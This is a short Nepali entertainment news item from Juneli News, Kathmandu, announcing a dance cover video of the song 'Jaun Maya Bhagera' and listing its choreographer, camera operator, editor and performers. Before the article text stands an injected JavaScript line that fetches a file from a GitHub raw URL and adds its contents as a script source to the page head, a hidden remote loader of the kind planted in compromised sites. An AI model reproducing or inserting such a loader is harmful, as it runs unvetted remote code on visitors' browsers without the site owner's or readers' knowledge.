;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौँ |
फ्रेण्डसिप डान्स सेन्टरका संचालक तथा नृत्य निर्देशक बाबु सेन्चुरीको निर्देशन तथा कोरियोग्राफीमा “जाउन माया भागेर” गीतको कभर भिडियो निर्माण भएको छ | ह्यारी कट्टेलको छायांकन र उमेश दाहालले सम्पादन गरेको सो भिडियोमा बाबु सेन्चुरी,सिम्रन खडका, मदन लामा, सरु श्रेस्ठ, अभिनाश घलान, अनुशा पौडेल, सियोन तामाङ, सनम बिष्ट, मनोज मगर, निकिशा तामाङ, सुदिप तामाङ, मनिषा लामा, कबिता गिरी लगायतका कलाकारहरु रहेका छन् | भिडियो तल छ, हेर्नु होला ……………….
फेसबुक प्रतिक्रियाहरु